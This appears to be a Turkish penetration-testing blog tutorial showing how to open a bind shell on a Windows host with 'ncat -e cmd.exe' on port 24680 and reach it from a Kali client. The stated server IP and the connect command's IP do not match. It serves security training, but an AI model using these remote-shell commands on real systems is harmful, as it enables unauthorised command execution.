Ncat Aracı Kullanılarak Windows Sunucu Bilgisayarın Komut Satırına Doğrudan (Bind) Erişim Sağlanması

0
726
views
Ncat (netcat), komut satırından ağ üzerinde veri okuma / yazma işlemlerini gerçekleştirmeye yarayan bir araçtır. Bu aracın Linux ve Windows sürümleri bulunmaktadır. Bu yazıda, Windows bir bilgisayar sunucu olarak kullanılacak ve kendisine ağ üzerinden bağlantı kuran Linux istemci bilgisayarın Windows komut satırına doğrudan (bind connection) erişim elde edebildiği görülecektir.

Pentist: Sızma Testleri ve Bilgi Güvenliği Danışmanlık Hizmetleri

Kali bilgisayarlarda ncat aracı varsayılan olarak bulunmaktadır. Bunun yanında, Windows bilgisayar için ncat aracı Nmap sayfasından (http://nmap.org/ncat/) indirilebilir.

Windows bilgisayarın komut satırının belirli bir porttan (TCP\24680) hizmete açılması aşağıdaki gibidir.

whoami
ncat.exe -lkvvnp 24680 -e cmd.exe

acquiring-cmd-shell-on-windows-server-by-using-ncat-tool-01

Kali istemci bilgisayarından Windows sunucu bilgisayarının (192.168.234.129) açılan portu üzerinden komut satırına erişim aşağıdaki gibidir. Erişim sağlandıktan sonra, Windows sunucunun komut satırındaymış gibi komutlar çalıştırılabilir.

ncat 192.168.234.131 24680
whoami

acquiring-cmd-shell-on-windows-server-by-using-ncat-tool-02

Böylece, Windows sunucu bilgisayarında doğrudan (bind) bir bağlantının oluştuğu ve “cmd.exe” komutunun çalıştığı görülmektedir.

acquiring-cmd-shell-on-windows-server-by-using-ncat-tool-03

 

 

Pentist: Sızma Testleri ve Bilgi Güvenliği Danışmanlık Hizmetleri

CEVAP VER

Yorumunuzu giriniz
İsminizi giriniz

Bu site, istenmeyenleri azaltmak için Akismet kullanıyor. Yorum verilerinizin nasıl işlendiği hakkında daha fazla bilgi edinin.